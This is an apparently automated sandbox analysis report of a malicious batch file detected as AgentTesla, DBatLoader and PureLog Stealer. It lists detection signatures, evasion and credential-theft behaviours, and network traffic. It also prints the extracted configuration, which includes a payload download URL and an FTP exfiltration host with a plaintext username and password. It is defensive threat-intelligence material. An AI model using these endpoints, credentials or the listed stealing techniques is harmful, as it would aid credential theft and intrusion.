Windows Analysis Report
z1Transaction_ID_REF2418_cmd.bat

Overview

General Information

Sample name: z1Transaction_ID_REF2418_cmd.bat
Analysis ID: 1545203
MD5: 597443c0b1405f3deaa48eef7de516c4
SHA1: 8f3688a384a9a8c8f70fc6a19382d73fbded0674
SHA256: 553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
Tags: bat, user-Porcupine

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: z1Transaction_ID_REF2418_cmd.bat Malware Configuration Extractor: DBatLoader {"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\x.exe ReversingLabs: Detection: 31%
Source: z1Transaction_ID_REF2418_cmd.bat ReversingLabs: Detection: 23%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack
Source: unknown HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 13_2_00401612

Networking

Source: Network traffic Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49744 -> 110.4.45.197:21
Source: Network traffic Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49747 -> 110.4.45.197:54601
Source: Network traffic Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49753 -> 110.4.45.197:21
Source: Network traffic Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49754 -> 110.4.45.197:63940
Source: Malware configuration extractor URLs: https://himalayastrek.com/origins/233_Cllyjbrxmng
Source: global traffic TCP traffic: 110.4.45.197 ports 50707,62466,63940,62962,56275,55553,1,2,53369,54601,61195,21
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DE4B8 InternetCheckConnectionA, 3_2_031DE4B8
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 110.4.45.197:50707
Source: Joe Sandbox View IP Address: 110.4.45.197
Source: Joe Sandbox View IP Address: 172.67.74.152
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: api.ipify.org
Source: unknown FTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- | 220-You are user number 10 of 50 allowed. | 220-Local time is now 15:35. Server port: 21. | 220-This is a private system - No anonymous login | 220-IPv6 connections are also welcome on this server. | 220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: himalayastrek.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: himalayastrek.com
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: ftp.haliza.com.my
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ftp.haliza.com.my
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: x.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.dr String found in binary or memory: http://www.pmail.com
Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, 